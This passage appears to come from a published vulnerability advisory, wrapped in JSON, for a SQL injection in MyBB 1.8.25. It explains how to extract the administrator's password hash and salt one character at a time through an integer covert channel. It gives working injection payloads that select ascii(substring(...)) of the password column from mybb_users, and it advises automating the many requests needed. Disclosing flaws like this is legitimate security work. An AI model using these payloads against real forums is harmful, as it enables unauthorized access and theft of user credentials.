\nIn this case, the number is the ASCII code of the first character of the result of the injected select version() query. \nThis way we can transfer the output through this covert channel, one character at a time. \n \nIn order to extract the admin hash, one has to either perform many requests (so it's best to automate it), or find a better way to convert a substring varchar to int. 
\n \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 2, 1))),'0','0','1','1') -- -a \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 3, 1))),'0','0','1','1') -- -a \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 4, 1))),'0','0','1','1') -- -a \n1','2',ascii((substring((SELECT password FROM mybb_users WHERE username=\"sivertpl\"), 5, 1))),'0','0','1','1') -- -a \n \n... etc. \n \nThis will send the ASCII codes of every char of the hashed password through the integer covert channel. \n \n \n10) After sending enough requests, you should have the hashed admin password. Repeat the entire process to acquire the salt. \n`\n", "cvss": {"score": 6.5, "vector": "AV:N/AC:L/Au:S/C:P/I:P/A:P"}, "sourceHref": "https://packetstormsecurity.com/files/download/161918/mybb1825-sql.txt"}]}